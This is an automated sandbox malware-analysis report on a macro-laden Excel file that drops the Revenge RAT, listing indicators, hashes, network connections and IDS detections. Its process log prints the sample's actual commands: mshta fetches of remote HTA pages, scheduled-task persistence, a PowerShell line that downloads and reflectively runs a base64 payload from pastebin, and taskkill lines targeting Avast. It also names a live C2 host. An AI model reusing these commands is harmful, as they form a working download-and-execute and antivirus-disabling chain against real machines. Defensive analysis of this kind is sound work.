analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

100000.xls

Full analysis: https://app.any.run/tasks/0b20115e-21f6-4114-9ddb-31d58873e254
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: January 10, 2019, 23:27:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
rat
revenge
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: GonzoMobzaluz, Last Saved By: GonzoMobzaluz, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 03:30:06 2018, Last Saved Time/Date: Wed Dec 19 03:42:50 2018, Security: 0
MD5:

47C3D3B14634C1B9FED79FC961F7DA0B

SHA1:

086463BAB82480E89A79722701DF1C543E378FDA

SHA256:

62706E2512E5A7F369730CCE4AB45D70703C762D8EB6DBA7148B8099F7C39FAC

SSDEEP:

1536:eDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAbdIxtckcfyKH+xDH8mCUO7xTvrsgR:eDZ+RwPONXoRjDhIcp0fDlaGGx+cL26x

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 4056)
      • schtasks.exe (PID: 3324)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2976)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2824)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2976)
    • Changes settings of System certificates

      • mshta.exe (PID: 2824)
    • REVENGE was detected

      • powershell.exe (PID: 3772)
    • Connects to CnC server

      • powershell.exe (PID: 3772)
  • SUSPICIOUS

    • Creates files in the user directory

      • mshta.exe (PID: 2824)
      • powershell.exe (PID: 3772)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2824)
    • Uses TASKKILL.EXE to kill process

      • forfiles.exe (PID: 2092)
      • forfiles.exe (PID: 2868)
      • forfiles.exe (PID: 3504)
      • forfiles.exe (PID: 2864)
      • forfiles.exe (PID: 272)
      • forfiles.exe (PID: 3928)
      • forfiles.exe (PID: 2148)
      • forfiles.exe (PID: 3072)
      • forfiles.exe (PID: 2904)
      • cmd.exe (PID: 4020)
      • forfiles.exe (PID: 4048)
      • forfiles.exe (PID: 2724)
      • forfiles.exe (PID: 2768)
      • forfiles.exe (PID: 2472)
      • forfiles.exe (PID: 3408)
      • forfiles.exe (PID: 2480)
      • forfiles.exe (PID: 3632)
      • forfiles.exe (PID: 3812)
      • forfiles.exe (PID: 3028)
      • forfiles.exe (PID: 3888)
      • forfiles.exe (PID: 2356)
      • forfiles.exe (PID: 2360)
      • forfiles.exe (PID: 2648)
      • forfiles.exe (PID: 3416)
      • forfiles.exe (PID: 3344)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2824)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • mshta.exe (PID: 3228)
    • Application launched itself

      • mshta.exe (PID: 3228)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 4020)
    • Executes PowerShell scripts

      • forfiles.exe (PID: 2852)
    • Connects to unusual port

      • powershell.exe (PID: 3772)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3228)
      • mshta.exe (PID: 2824)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Office Excel 2003 Worksheet
CompObjUserTypeLen: 38
HeadingPairs:
  • Worksheets
  • 3
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
Company: Grizli777
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2018:12:19 03:42:50
CreateDate: 2018:12:19 03:30:06
Software: Microsoft Excel
LastModifiedBy: GonzoMobzaluz
Author: GonzoMobzaluz
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
290
Monitored processes
254
Malicious processes
7
Suspicious processes
25

Behavior graph

Click at the process to see the details
start excel.exe no specs mshta.exe no specs mshta.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs schtasks.exe no specs forfiles.exe no specs forfiles.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs #REVENGE powershell.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2976"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
3228mshta vbscript:CreateObject("Wscript.Shell").Run("mshta http://www.bitly.com/lullimyra29",0,true)C:\Windows\system32\mshta.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2824"C:\Windows\System32\mshta.exe" http://www.bitly.com/lullimyra29C:\Windows\System32\mshta.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3324"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://b67x.blogspot.com/p/blog-page.html\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3760"C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3948"C:\Windows\System32\cmd.exe" /C forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/MeSdrbbq'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000" & forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/MeSdrbbq'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4020"C:\Windows\System32\cmd.exe" /c forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4056"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 10 /tn "MS-OFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin.com/raw/7ihEfAZF\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2092forfiles /c "taskkill /f /im AvastUi.exe" C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2852forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/MeSdrbbq'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000" C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 633
Read events
1 442
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
14
Unknown types
0

Dropped files

PID
Process
Filename
Type
2976EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE802.tmp.cvr
MD5:
SHA256:
2824mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[1]
MD5:
SHA256:
2824mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\warning[1]
MD5:
SHA256:
3772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\96EQ4Y5W2ED6G4BCU8Y4.temp
MD5:
SHA256:
2976EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF33B7884F2A007A96.TMP
MD5:
SHA256:
2824mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txttext
MD5:BEDD7C337D41E00D4465C9234585CADB
SHA256:B032928B86311540BCBEE0F5273000DBE85B6A7BECB6208F51AA7533CF318E0C
2824mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\864213505-ieretrofit[1].jstext
MD5:364501E083769DD2522BD01655BF399D
SHA256:0C20A9CE611E3EE5B32F6FF83F04D64EC7CFE867139AD51AA4E4AF210E1C9832
2824mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\error[2]text
MD5:35FE91C2AC1BA0913CC617622B9EB43F
SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
3772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2824mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\error[1]text
MD5:35FE91C2AC1BA0913CC617622B9EB43F
SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
10
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2824
mshta.exe
GET
301
67.199.248.14:80
http://bitly.com/lullimyra29
US
html
122 b
shared
2824
mshta.exe
GET
301
67.199.248.14:80
http://www.bitly.com/lullimyra29
US
html
178 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2824
mshta.exe
67.199.248.14:80
www.bitly.com
Bitly Inc
US
shared
2824
mshta.exe
172.217.23.129:443
b67x.blogspot.com
Google Inc.
US
whitelisted
2824
mshta.exe
216.58.207.73:443
www.blogger.com
Google Inc.
US
whitelisted
3772
powershell.exe
95.168.176.156:15100
helloweenhagga2.ddns.net
TR
malicious
3772
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
www.bitly.com
  • 67.199.248.14
  • 67.199.248.15
shared
b67x.blogspot.com
  • 172.217.23.129
whitelisted
www.blogger.com
  • 216.58.207.73
shared
resources.blogblog.com
  • 216.58.207.73
whitelisted
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
helloweenhagga2.ddns.net
  • 95.168.176.156
malicious

Threats

PID
Process
Class
Message
2824
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
2824
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
3772
powershell.exe
A Network Trojan was detected
SC BACKDOOR Backdoor RevengeRAT Win32
3772
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
3772
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3772
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3772
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3772
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
20 ETPRO signatures available at the full report
No debug info